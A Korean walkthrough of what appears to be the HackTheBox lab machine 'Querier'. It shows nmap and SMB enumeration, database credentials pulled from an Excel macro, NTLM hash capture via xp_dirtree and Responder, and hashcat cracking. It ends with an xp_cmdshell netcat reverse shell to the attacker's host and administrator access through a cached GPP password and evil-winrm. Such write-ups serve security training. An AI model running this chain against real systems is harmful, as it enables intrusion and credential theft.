1. 정찰
1.1. nmap
┌──(root㉿kali)-[/home/kali/labs/Querier]
└─# nmap -sC -sV 10.129.52.220 --max-retries 1 --min-rate 5000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-03 08:54 +04
Warning: 10.129.52.220 giving up on port because retransmission cap hit (1).
Nmap scan report for 10.129.52.220
Host is up (0.19s latency).
Not shown: 65520 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
|_ssl-date: 2026-01-03T04:55:34+00:00; 0s from scanner time.
| ms-sql-info:
| 10.129.52.220:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.52.220:1433:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: QUERIER
| DNS_Domain_Name: HTB.LOCAL
| DNS_Computer_Name: QUERIER.HTB.LOCAL
| DNS_Tree_Name: HTB.LOCAL
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-01-03T04:52:58
|_Not valid after: 2056-01-03T04:52:58
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47559/tcp filtered unknown
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2026-01-03T04:55:28
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.26 seconds
1.2. smb 열거
smbclient -N -L 이 왜 안 되는지 모르겠는데, 다른 자료를 참고해서 Reports 가 있다는 사실을 확인하고, 해당 디렉터리에 접근한다. 그리고 Currency Volume Report.xlsm 를 다운로드 받는다.
┌──(root㉿kali)-[/home/kali/labs/Querier]
└─# smbclient -N \\\\10.129.52.224\\Reports
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jan 29 03:23:48 2019
.. D 0 Tue Jan 29 03:23:48 2019
Currency Volume Report.xlsm A 12229 Mon Jan 28 02:21:34 2019
5158399 blocks of size 4096. 850222 blocks available
smb: \> get "Currency Volume Report.xlsm"
getting file \Currency Volume Report.xlsm of size 12229 as Currency Volume Report.xlsm (13.8 KiloBytes/sec) (average 13.8 KiloBytes/sec)
smb: \>
2. 내부망 침투
2.1. xlsm 파일 열거
windows 의 파일은 xlsm 은 리눅스에서 열리지 않기 때문에 oletools 를 다운받아서 사용한다.
┌──(root㉿kali)-[/home/kali/labs/Querier]
└─# sudo -H pip install -U oletools[full] --break-system-packages
Requirement already satisfied: oletools[full] in /usr/local/lib/python3.13/dist-packages (0.60.2)
Requirement already satisfied: pyparsing<4,>=2.1.0 in /usr/lib/python3/dist-packages (from oletools[full]) (3.1.2)
Requirement already satisfied: olefile>=0.46 in /usr/lib/python3/dist-packages (from oletools[full]) (0.47)
Requirement already satisfied: easygui in /usr/local/lib/python3.13/dist-packages (from oletools[full]) (0.98.3)
Requirement already satisfied: colorclass in /usr/local/lib/python3.13/dist-packages (from oletools[full]) (2.2.2)
Requirement already satisfied: pcodedmp>=1.2.5 in /usr/local/lib/python3.13/dist-packages (from oletools[full]) (1.2.6)
Requirement already satisfied: msoffcrypto-tool in /usr/local/lib/python3.13/dist-packages (from oletools[full]) (5.4.2)
Collecting XLMMacroDeobfuscator (from oletools[full])
Downloading XLMMacroDeobfuscator-0.2.7-py3-none-any.whl.metadata (9.3 kB)
[...SNIP...]
그 다음에 olevba 를 통해서 해당 파일을 열면 아래와 같은 결과가 나온다. 그러면 id가 reporting 이고 PcwTWTHRwryjc$c6 라는 pw를 가지고 있다.
┌──(root㉿kali)-[/home/kali/labs/Querier]
└─# olevba Currency\ Volume\ Report.xlsm
XLMMacroDeobfuscator: pywin32 is not installed (only is required if you want to use MS Excel)
olevba 0.60.2 on Python 3.13.3 - http://decalage.info/python/oletools
===============================================================================
FILE: Currency Volume Report.xlsm
Type: OpenXML
WARNING For now, VBA stomping cannot be detected for files in memory
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
macro to pull data for client volume reports
further testing required
Private Sub Connect()
Dim conn As ADODB.Connection
Dim rs As ADODB.Recordset
Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open
If conn.State = adStateOpen Then
' MsgBox "connection successful"
'Set rs = conn.Execute("SELECT * @@version;")
Set rs = conn.Execute("SELECT * FROM volume;")
Sheets(1).Range("A1").CopyFromRecordset rs
rs.Close
End If
End Sub
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|Suspicious|Open |May open a file |
|Suspicious|Hex Strings |Hex-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
+----------+--------------------+---------------------------------------------+
2.2. mssqlclient 를 이용한 reporting 계정 접근
mssqlclient 를 통해서 기존에 획득한 reporting 계정을 통해 접근을 시도한다.
┌──(root㉿kali)-[/home/kali/labs/Querier]
└─# impacket-mssqlclient reporting:'PcwTWTHRwryjc$c6'@10.129.52.224 -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL (QUERIER\reporting reporting@volume)>
xp_cmdshell 을 통해서 windows 명령어를 실행해 보지만 권한이 없어서 실행되지 않는다.
SQL (QUERIER\reporting reporting@volume)> xp_cmdshell whoami
ERROR(QUERIER): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
2.3. mssql-svc 계정 탈취
windows 명령어를 칠 수 없어서 공유 폴더에 접근하는 방식을 통해서 mssql 의 서비스 계정의 해쉬를 탈취한다.
┌──(root㉿kali)-[/home/kali]
└─# responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.6.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
EXEC master..xp_dirtree 를 통해서 공유 폴더에 접근하는데, 실존하지 않는 공유 폴더에 접근을 시도한다. \\10.10.14.143\a 와 같이 작성하면 responder 에서 해쉬를 잡을 수 있다.
SQL (QUERIER\reporting reporting@volume)> EXEC master..xp_dirtree '\\10.10.14.143\a';
subdirectory depth
------------ -----
그러면 responder 에서 해쉬를 확인할 수 있다.
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.52.224
[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMB] NTLMv2-SSP Hash : mssql-svc::QUERIER:d95592c76c7e2cb5:4F624B4C89031056AB0DA2503B4F30F9:01010000000000000044F2EE987CDC0128752D0D42751F580000000002000800540056005900350001001E00570049004E002D005600580032003000420050005200460049005500590004003400570049004E002D00560058003200300042005000520046004900550059002E0054005600590035002E004C004F00430041004C000300140054005600590035002E004C004F00430041004C000500140054005600590035002E004C004F00430041004C00070008000044F2EE987CDC010600040002000000080030003000000000000000000000000030000020C2D7290EED98C25635455332E683C45FA60D8A2B5C0CB41A2E4D3E985179870A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E00310034003300000000000000000000000000
획득한 해쉬를 hashcat 을 통해서 복호화를 진행한다. 비밀번호 corporate568 를 획득할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Querier]
└─# hashcat hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu--0x000, 2909/5883 MB (1024 MB allocatable), 4MCU
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
5600 | NetNTLMv2 | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
MSSQL-SVC::QUERIER:d95592c76c7e2cb5:4f624b4c89031056ab0da2503b4f30f9:01010000000000000044f2ee987cdc0128752d0d42751f580000000002000800540056005900350001001e00570049004e002d005600580032003000420050005200460049005500590004003400570049004e002d00560058003200300042005000520046004900550059002e0054005600590035002e004c004f00430041004c000300140054005600590035002e004c004f00430041004c000500140054005600590035002e004c004f00430041004c00070008000044f2ee987cdc010600040002000000080030003000000000000000000000000030000020c2d7290eed98c25635455332e683c45fa60d8a2b5c0cb41a2e4d3e985179870a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e00310034003300000000000000000000000000:corporate568
[...SNIP...]
2.4. mssql-svc 계정을 통한 windows 쉘 획득
mssql-svc 계정을 통해서 mssqlclient 로 접근을 하면 로그인에 성공하는 것을 확인할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Querier]
└─# impacket-mssqlclient mssql-svc:'corporate568'@10.129.52.224 -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'master'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL (QUERIER\mssql-svc dbo@master)>
이전처럼 xp_cmdshell 을 통해서 whoami 와 같은 windows 명령어를 작성해 보면 denied 가 아닌 blocked 로 나오는 걸로 보아 작동할 가능성을 확인할 수 있다.
SQL (QUERIER\mssql-svc dbo@master)> xp_cmdshell whoami
ERROR(QUERIER): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
enable_xp_cmdshell 을 이용하여 xp_cmdshell 을 작동할 수 있게 만든 다음데 다시 시도하면 정상적으로 windows명령어가 작동하는 것을 확인할 수 있다.
SQL (QUERIER\mssql-svc dbo@master)> enable_xp_cmdshell
INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (QUERIER\mssql-svc dbo@master)> xp_cmdshell whoami
output
-----------------
querier\mssql-svc
NULL
windows 명령어가 작동하는 것을 확인했으므로 리버스 쉘을 맺을 수 있을 것이다. 그래서 smbserver 를 통해서 nc.exe 파일을 이용해 리버스 쉘 명령어를 보낸다.
SQL (QUERIER\mssql-svc dbo@master)> xp_cmdshell //10.10.14.143/share/nc.exe -e cmd.exe 10.10.14.143 443
output
------
NULL
kali 에서 443 번 포트로 수신을 대기한 다음에 쉘을 받을 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Querier]
└─# rlwrap -cAr nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.143] from (UNKNOWN) [10.129.52.224] 49681
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
querier\mssql-svc
C:\Windows\system32>
이후 mssql-svc 를
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 35CB-DA81
Directory of C:\Users
01/28/2019 11:41 PM <DIR> .
01/28/2019 11:41 PM <DIR> ..
01/28/2019 10:17 PM <DIR> Administrator
01/28/2019 11:42 PM <DIR> mssql-svc
01/28/2019 10:17 PM <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 3,476,443,136 bytes free
C:\Users>cd mssql-svc
cd mssql-svc
C:\Users\mssql-svc>cd Desktop
cd Desktop
C:\Users\mssql-svc\Desktop>type user.txt
type user.txt
3. 권한 상승
3.1. powerup.ps1 이용
powerup.ps1 을 이용해서 권한상승을 노릴 것이다.
C:\Users\mssql-svc\Desktop>cd ..\appdata\local\temp
cd ..\appdata\local\temp
C:\Users\mssql-svc\AppData\Local\Temp>xcopy \\10.10.14.143\share\powerup.ps1 .
xcopy \\10.10.14.143\share\powerup.ps1 .
\\10.10.14.143\share\powerup.ps1
1 File(s) copied
파일을 실행하면 Passwords 항목에 평문으로 암호가 나온다.
C:\Users\mssql-svc\AppData\Local\Temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\mssql-svc\AppData\Local\Temp> . .\powerup.ps1
. .\powerup.ps1
PS C:\Users\mssql-svc\AppData\Local\Temp> Invoke-AllChecks
Invoke-AllChecks
Privilege : SeImpersonatePrivilege
Attributes : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
TokenHandle : 2456
ProcessId : 4380
Name : 4380
Check : Process Token Privileges
ServiceName : UsoSvc
Path : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart : True
Name : UsoSvc
Check : Modifiable Services
ModifiablePath : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
IdentityReference : QUERIER\mssql-svc
Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH% : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Name : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
UnattendPath : C:\Windows\Panther\Unattend.xml
Name : C:\Windows\Panther\Unattend.xml
Check : Unattended Install Files
Changed : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File : C:\ProgramData\Microsoft\Group
Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
Check : Cached GPP Files
evil-winrm 으로 로그인 시도하면 로그인에 성공하는 것을 확인할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Querier]
└─# evil-winrm -i 10.129.52.224 -u administrator -p 'MyUnclesAreMarioAndLuigi!!1!'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt